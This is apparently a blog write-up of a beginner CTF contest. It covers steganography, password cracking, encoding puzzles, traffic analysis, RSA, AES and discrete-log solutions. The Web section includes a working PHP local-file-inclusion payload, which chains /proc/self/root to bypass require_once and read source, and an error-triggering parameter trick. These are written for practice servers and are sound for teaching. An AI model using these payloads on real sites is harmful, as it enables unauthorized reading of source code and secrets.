Dest0g3 520迎新赛

发表于 更新于 分类于 本文字数: 15k 阅读时长 ≈ 14 分钟

Dest0g3 520迎新赛

Dest0g3首次招新啦!

Dest0g3 Team现逐步发展到各大高校及安全公司均有成员分布,在过去的半年里先后取得L3HCTF第十、SCTF第六及SUSCTF第四的优异成绩。

首届Dest0g3 520迎新赛更加注重CTFer的基础知识面掌握程度,由易到难,适合各学习阶段选手参加,纯萌新水准。

Dest0g3期待更多新生力量的加入,如有意向请在赛后提交wp与简历,或联系@Dest0g3 Team (QQ:1115230222)

比赛时间:2022.5.20 10:00 - 5.27 10:00

题目分类:Web、Pwn、Misc、Crypto、Re、AI、BlockChain

题目难度:萌新

比赛类型:个人赛

比赛交流QQ群:923945203

个人赛奖励:总榜前10及各方向前三均可获得《从0到1:CTFer成长之路》一本 + 定制U盘(32G)一个

Misc

Welcome to fxxking DestCTF

**题目描述:**关注公众号并回复:Give me the fxxking flag

**附件下载:**https://files.buuoj.cn/files/8fc59c32ce5bcf7da3917ad4a3a023ba/jpg

做题过程:

将附件拖入浏览器查看。获得二维码,扫码关注公众号,输入提示给的:Give me the fxxking flag

img点击并拖拽以移动

获取flag:Dest0g3{W31c0m3_t0_DestCTF2022!}

Pngenius

题目描述:

**附件下载:**https://files.buuoj.cn/files/5a64d4c2532f28b79aa99089c3f76ff5/Dest0g3.png

做题过程:

1、获取图片是PNG格式,首先想到的就是LSB隐写,使用工具stegslove查看

在r 0 g 0 b 0处发现有变化。

img点击并拖拽以移动img点击并拖拽以移动img点击并拖拽以移动

2、使用stegslove自带的Data Extract 数据提取工具对三处异常,进行查看。

img点击并拖拽以移动img点击并拖拽以移动

3、 得到一个压缩包的解压密码,返回图片,使用binwalk进行扫描,并提取压缩包

img点击并拖拽以移动

4、输入压缩包密码Weak_Pas5w0rd,打开压缩包,获取flag.txt。

img点击并拖拽以移动

获取flag:Dest0g3{2908C1AA-B2C1-B8E6-89D1-21B97D778603}

EasyEncode

**题目描述:**Enjoy Decoding

**附件下载:**https://files.buuoj.cn/files/2fb77a72cba82a4c9a749998a1073e58/encode.zip

做题过程:

下载附件,是个ZIP文件,解压,发现有加密,丢进010 edtier中查看

img点击并拖拽以移动

2、发现不是伪加密,于是试着用ARCHPR爆破一下,密码长度选择4-6位。

img点击并拖拽以移动

获得密码100861,解压压缩包,打开文本文件,发现摩斯编码:

img点击并拖拽以移动

3、下面就是解码过程:

运用在线工具在线摩斯密码翻译器 (lddgo.net)

img点击并拖拽以移动

获得一串Hex(十六进制)编码,运用在线工具HEX转字符 十六进制转字符 hex gb2312 gbk utf8 汉字内码转换 - The X 在线工具 (the-x.cn)转字符:

img点击并拖拽以移动

获得一串unicode编码,使用在线工具Unicode编码转换 - 站长工具 (chinaz.com)

img点击并拖拽以移动

“%3D”在url编码中是“=”’,所以进行base64解码,运用在线工具:Base64解码 Base64编码 UTF8 GB2312 UTF16 GBK 二进制 十六进制 解密 - The X 在线工具 (the-x.cn)

img点击并拖拽以移动

获得flag:Dest0g3{Deoding_1s_e4sy_4_U}

你知道js吗

题目描述:

**附件下载:**https://files.buuoj.cn/files/5f1fc294b6468f733b774ceee6106062/flag

做题过程:

1、下载,附件,懒了,不想开010,直接吧附件扔到浏览器,浏览器自动编译后下载了一个flag.zip文件

img点击并拖拽以移动

2、打开压缩包,看到一堆XML格式的文件,直接扔浏览器里。

img点击并拖拽以移动

在docoment.xml中发现三串base64特征字符,拼接解码后获得

1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
            <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<application xmlns="urn:schemas-microsoft-com:asm.v3">
        <dpiAwareness xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">Do you know js</dpiAwareness>
<script language="javascript">document.write(unescape('%3Chtml%3E%0A%3Cbody%3E%0A%0A%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EDo%20You%20Know%20js%3C%2Ftitle%3E%0A%3CHTA%3AAPPLICATION%0A%20%20APPLICATIONNAME%3D%22Do%20You%20Know%20js%22%0A%20%20ID%3D%22Inception%22%0A%20%20VERSION%3D%221.0%22%0A%20%20SCROLL%3D%22no%22%2F%3E%0A%20%0A%3Cstyle%20type%3D%22text%2Fcss%22%3E%0A%3C%2Fhead%3E%0A%20%20%20%20%3Cdiv%20id%3D%22feature%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22content%0A%09%09%09%09%3C%2Fstyle%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Ch1%20id%3D%22unavailable%22%20class%3D%22loading%22%3EBuilding%20js.....%3C%2Fh1%3E%0A%09%09%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20language%3D%22javascript%22%3E%0A%09%09%09%09%09function%20RunFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20var%20WshShell%20%3D%20new%20ActiveXObject%28%22WScript.Shell%22%29%3B%0A%09%09%09%09%09WshShell.Run%28%22notepad%20%25windir%25%2FDesktop%2Fjs.txt%22%2C%201%2C%20false%29%3B%0A%20%20%20%20%20%20%20%20%20%20%2F*%20var%20oExec%20%3D%20WshShell.Exec%28%22notepad%22%29%3B%20*%2F%0A%09%09%09%09%09%7D%0A%09%09%09%09%3C%2Fscript%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%3Cbody%3E%0A%09%3Cinput%20type%3D%22button%22%20value%3D%22Implant%20Inception%20Here%22%20onclick%3D%22RunFile%28%29%3B%22%2F%3E%0A%09%3Cp%20style%3D%22color%3Awhite%3B%22%3E%0A%0A%2B%2B%2B%2B%2B%20%2B%2B%5B-%3E%20%2B%2B%2B%2B%2B%20%2B%2B%3C%5D%3E%20%2B%2B%2B..%20%2B%2B.-.%20%2B%2B.--%20--.%2B%2B%20%2B%2B.--%20%0A-.-.-%20--.%2B%2B%20%2B%2B%2B%2B.%0A%2B.---%20-..%2B%2B%20%2B%2B.%3C%2B%20%2B%2B%5B-%3E%20%2B%2B%2B%3C%5D%20%3E%2B%2B.%3C%20%2B%2B%2B%5B-%20%0A%3E---%3C%20%5D%3E---%20---.%2B%20%2B%2B%2B%2B.%20-----%0A.%2B%2B%2B.%20...--%20---.%2B%20%2B%2B%2B%2B.%20---.%2B%20%2B%2B.--%20---.%2B%20%2B%2B%2B%2B.%20---..%20%2B%2B%2B%2B%2B%20%2B.---%20----.%0A%3C%2B%2B%2B%2B%20%5B-%3E%2B%2B%20%2B%2B%3C%5D%3E%20%2B%2B.%3C%2B%20%2B%2B%2B%5B-%20%3E----%20%3C%5D%3E-.%20---.%2B%0A%20%2B%2B%2B%2B%2B%20.----%20-.%2B%2B.%20%2B%2B.%2B.%0A--.--%20.%3C%2B%2B%2B%20%2B%5B-%3E%2B%20%2B%2B%2B%3C%5D%20%3E%2B%2B.%3C%20%2B%2B%2B%2B%5B%20-%3E---%20-%3C%5D%3E-%20%0A.%2B.-.%20---.%2B%20%2B%2B.%2B.%20-.%2B%2B%2B%0A%2B.---%20--.%3C%2B%20%2B%2B%2B%5B-%20%3E%2B%2B%2B%2B%20%3C%5D%3E%2B%2B%20.%3C%2B%2B%2B%20%5B-%3E--%20-%3C%5D%3E-%20----.%20----.%20%2B.%2B%2B%2B%20%2B.---%0A-.---%20.%2B%2B%2B.%20-..%3C%2B%20%2B%2B%2B%5B-%20%3E%2B%2B%2B%2B%20%3C%5D%3E%2B%2B%20%0A.%3C%2B%2B%2B%20%2B%5B-%3E-%20---%3C%5D%20%3E-.%2B%2B%20%2B%2B%2B.-%20----.%0A%2B%2B%2B..%20---.%2B%20%2B%2B.--%20--.%2B.%20..%2B%2B%2B%20%2B.-.-%20----.%20%2B%2B%2B%2B%2B%20%0A.----%20.%2B.%2B%2B%20%2B%2B.--%20--.%2B%2B%0A%2B%2B.-.%20----.%20%2B.-.%2B%20%2B%2B%2B%2B.%20%0A%3C%2B%2B%2B%5B%20-%3E%2B%2B%2B%20%3C%5D%3E%2B%2B%20%2B%2B.%3C%0A%3C%2Fp%3E%0A%3C%2Fbody%3E%0A%3C%2Fbody%3E%0A%20%20%3C%2Fhtml%3E%0A'));</script>

点击并拖拽以移动

辨别解码后是,url编码,在线工具解码UrlDecode解码/UrlEncode编码 GB2312 UTF8 - The X 在线工具 (the-x.cn)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<html>
<body>

<!DOCTYPE html>
<html>
<head>
    <title>Do You Know js</title>
<HTA:APPLICATION
  APPLICATIONNAME="Do You Know js"
  ID="Inception"
  VERSION="1.0"
  SCROLL="no"/>
 
<style type="text/css">
</head>
    <div id="feature">
            <div id="content
				</style>
                <h1 id="unavailable" class="loading">Building js.....</h1>
				<script type="text/javascript" language="javascript">
					function RunFile() {
          var WshShell = new ActiveXObject("WScript.Shell");
					WshShell.Run("notepad %windir%/Desktop/js.txt", 1, false);
          /* var oExec = WshShell.Exec("notepad"); */
					}
				</script>
        </div>
    </div>
<body>
	<input type="button" value="Implant Inception Here" onclick="RunFile();"/>
	<p style="color:white;">

+++++ ++[-> +++++ ++<]> +++.. ++.-. ++.-- --.++ ++.-- 
-.-.- --.++ ++++.
+.--- -..++ ++.<+ ++[-> +++<] >++.< +++[- 
>---< ]>--- ---.+ ++++. -----
.+++. ...-- ---.+ ++++. ---.+ ++.-- ---.+ ++++. ---.. +++++ +.--- ----.
<++++ [->++ ++<]> ++.<+ +++[- >---- <]>-. ---.+
 +++++ .---- -.++. ++.+.
--.-- .<+++ +[->+ +++<] >++.< ++++[ ->--- -<]>- 
.+.-. ---.+ ++.+. -.+++
+.--- --.<+ +++[- >++++ <]>++ .<+++ [->-- -<]>- ----. ----. +.+++ +.---
-.--- .+++. -..<+ +++[- >++++ <]>++ 
.<+++ +[->- ---<] >-.++ +++.- ----.
+++.. ---.+ ++.-- --.+. ..+++ +.-.- ----. +++++ 
.---- .+.++ ++.-- --.++
++.-. ----. +.-.+ ++++. 
<+++[ ->+++ <]>++ ++.<
</p>
</body>
</body>
  </html>
'));</script>

点击并拖拽以移动

辨别是Brainfuck/Ook!编码,使用在线工具解码:[Brainfuck/Ook! Obfuscation/Encoding splitbrain.org]

img点击并拖拽以移动

解出获得:

446573743067337B38366661636163392D306135642D343034372D623730322D3836636233376162373762327D

img点击并拖拽以移动

接着Hex转文字就可以,使用在线工具HEX转字符 十六进制转字符 hex gb2312 gbk utf8 汉字内码转换 - The X 在线工具 (the-x.cn)

img点击并拖拽以移动

获取flag:Dest0g3{86facac9-0a5d-4047-b702-86cb37ab77b2}

StrangeTraffic

题目描述:

**附件下载:**https://files.buuoj.cn/files/c329bafcc0113003c060d62f8f99b2e7/StrangeTraffic.pcapng

做题过程:

1、下载附件,虚拟机kali打开文件,wireshark分析,可以看出是mudbus工控流量。追踪TCP流,在流0处看到可疑的东西,将展现形式改为Hex转储

img点击并拖拽以移动

2、在尾部存在base64特征编码,手动提取:

RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9

img点击并拖拽以移动

img点击并拖拽以移动

获取flag:Dest0g3{31A5BEA6-F20D-F18A-E8EA-29B4F257108B}

EasyWord

**题目描述:**Let the word tell u

**附件下载:**https://files.buuoj.cn/files/aae5e40774fcd4089557007b1b030f41/EasyWord.zip

做题过程:

下载附件,打开压缩包,得到一个加密的docm文件,hint提示说六位小写字母加密,并给出了第三位和第五位,于是考虑用工具AOPRT:

img点击并拖拽以移动

爆破了好几次,结果都不对,别放弃使用该方法。

Web

phpdest

题目描述:

**附件下载:**http://d10eb908-5734-4807-9b12-493d578d495c.node4.buuoj.cn:81/(环境在Buuctf一直都有,可以自行打开)

做题过程:

1、点开链接,获得解密源码,第一时间想到的是文件包含,堆叠注入。构建payload试一下:

1
?file=php://filter/read=convert.base64-encode/resource=flag.php

点击并拖拽以移动

img点击并拖拽以移动

没有回显,对php代码审计,发现 require_once函数,发现干货了

require_once() 语句在脚本执行期间包括并运行指定文件。此行为和 require() 语句类似,唯一区别是如果该文件中的代码已经被包括了,则不会再次包括。

PHP最新版的小Trick,require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含

1
/proc/[pid]`记录了系统运行的信息状态,而`/proc/self`指的是当前进程(自身进程)的pid,就类似于类里面的`this

/proc/self/root/是指向/的符号链接

构造payload

1
?file=php://filter/read=convert.base64-encode/resource/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

点击并拖拽以移动

img点击并拖拽以移动

获得flag.php的源码,base64解码获得flag:

Dest0g3{f05260c1-70e9-481b-89b1-eb397377f621}

EasyPHP

**题目描述:**Post something

附件下载:d7cb2110-b7b2-4ff0-9ce7-a5788de17012.node4.buuoj.cn:81(环境在Buuctf一直都有,可以自行打开)

做题过程:

1、点开链接,获取界面:

img点击并拖拽以移动

2、没啥干的,直接代码审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
highlight_file(__FILE__);//高亮显示,没啥用
include "fl4g.php";//读取fl4g.php文件
$dest0g3 = $_POST['ctf'];//对dest0g3传入参数‘ctf’
$time = date("H");//对时间的限制,下同
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){//如果时间为假,则输出fl4g,反之输出"Try harder!",很显然时间不可能为假。
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(//看到这个函数,就有解了后有详解,既对传入参数进行比对,只要让他运行错误就行。
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?> Try harder!

点击并拖拽以移动

干货:set_error_handler () 函数设置用户自定义的错误处理函数。. 该函数用于创建运行时期间的用户自己的错误处理方法。. 该函数会返回旧的错误处理程序,若失败,则返回 null。

3、构建数组报错POST:ctf[]=1

img点击并拖拽以移动

获取flag:Dest0g3{a57b8d1d-da8f-42ee-a782-3a92bc372ec3}

Crypto

babyRSA

题目描述:

**附件下载:**https://files.buuoj.cn/files/28e6d9906de54ebfdc565f9ef541bcbf/task.py

做题过程:

1、打开附件,fofa分解n,常规解。上脚本,获取flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import libnum
from Crypto.Util.number import long_to_bytes

c = 14181751948841206148995320731138166924841307246014981115736748934451763670304308496261846056687977917728671991049712129745906089287169170294259856601300717330153987080212591008738712344004443623518040786009771108879196701679833782022875324499201475522241396314392429412747392203809125245393462952461525539673218721341853515099201642769577031724762640317081252046606564108211626446676911167979492329012381654087618979631924439276786566078856385835786995011067720124277812004808431347148593882791476391944410064371926611180496847010107167486521927340045188960373155894717498700488982910217850877130989318706580155251854
n = 27272410937497615429184017335437367466288981498585803398561456300019447702001403165885200936510173980380489828828523983388730026101865884520679872671569532101708469344562155718974222196684544003071765625134489632331414011555536130289106822732544904502428727133498239161324625698270381715640332111381465813621908465311076678337695819124178638737015840941223342176563458181918865641701282965455705790456658431641632470787689389714643528968037519265144919465402561959014798324908010947632834281698638848683632113623788303921939908168450492197671761167009855312820364427648296494571794298105543758141065915257674305081267
e = 65537
q = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973969401
p = 165143607013706756535226162768509114446233024193609895145003307138652758365886458917899911435630452642271040480670481691733000313754732183700991227511971005378010205097929462099354944574007393761811271098947894183507596772524174007304430976545608980195888302421142266401500880413925699125132100053801973971467

d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)  # m 的十进制形式
string = long_to_bytes(m)  # m明文
print(string)  # 结果为 b‘ m ’ 的形式


#b'Dest0g3{96411aad-032c-20a8-bc43-b473f6f08536}'

点击并拖拽以移动

babyAES

题目描述:

**附件下载:**https://files.buuoj.cn/files/ded8ebffd78bc71ff21b41701727c875/task.py

做题过程:

1、打开附件,AES常规解。上脚本。

1
2
3
4
5
6
7
8
9
10
from Crypto.Cipher import AES

iv = b'\xd1\xdf\x8f)\x08w\xde\xf9yX%\xca[\xcb\x18\x80'
key = b'\xa4\xa6M\xab{\xf6\x97\x94>hK\x9bBe]F'
my_aes = AES.new(key, AES.MODE_CBC, iv)
c = b'C4:\x86Q$\xb0\xd1\x1b\xa9L\x00\xad\xa3\xff\x96 hJ\x1b~\x1c\xd1y\x87A\xfe0\xe2\xfb\xc7\xb7\x7f^\xc8\x9aP\xdaX\xc6\xdf\x17l=K\x95\xd07'
flag = my_aes.decrypt(c)
print(flag)

#b'Dest0g3{d0e5fa76-e50f-76f6-9cf1-b6c2d576b6f4}\x00\x00\x00'

点击并拖拽以移动

ezDLP

题目描述:

**附件下载:**https://files.buuoj.cn/files/67d5c3e2b9ac73c8ebf66665b077e33f/task.py

做题过程:

1、点开附件,尝试用Pohlig-Hellman 算法的方法,进行解密,但是想不通,就去搜了一下对pow()逆运算,发现sage有相应的函数,写解密脚本,放到sagemath(Sage Cell Server (sagemath.org))中运行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#Sage
g = 19
p = 335215034881592512312398694238485179340610060759881511231472142277527176340784432381542726029524727833039074808456839870641607412102746854257629226877248337002993023452385472058106944014653401647033456174126976474875859099023703472904735779212010820524934972736276889281087909166017427905825553503050645575935980580803899122224368875197728677516907272452047278523846912786938173456942568602502013001099009776563388736434564541041529106817380347284002060811645842312648498340150736573246893588079033524476111268686138924892091575797329915240849862827621736832883215569687974368499436632617425922744658912248644475097139485785819369867604176912652851123185884810544172785948158330991257118563772736929105360124222843930130347670027236797458715653361366862282591170630650344062377644570729478796795124594909835004189813214758026703689710017334501371279295621820181402191463184275851324378938021156631501330660825566054528793444353
h = 199533304296625406955683944856330940256037859126142372412254741689676902594083385071807594584589647225039650850524873289407540031812171301348304158895770989218721006018956756841251888659321582420167478909768740235321161096806581684857660007735707550914742749524818990843357217489433410647994417860374972468061110200554531819987204852047401539211300639165417994955609002932104372266583569468915607415521035920169948704261625320990186754910551780290421057403512785617970138903967874651050299914974180360347163879160470918945383706463326470519550909277678697788304151342226439850677611170439191913555562326538607106089620201074331099713506536192957054173076913374098400489398228161089007898192779738439912595619813699711049380213926849110877231503068464392648816891183318112570732792516076618174144968844351282497993164926346337121313644001762196098432060141494704659769545012678386821212213326455045335220435963683095439867976162
d=discrete_log(h,mod(g,p))
print(d)

#627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133

#接着在本地环境运行以下代码

from libnum import n2s
print(n2s(627467212751652661100750674849894892358409405070345081253130721039787502632741519936253501608002590652971133))

#Dest0g3{07ed2a6f-182f-a05d-c81e-1318af820a78}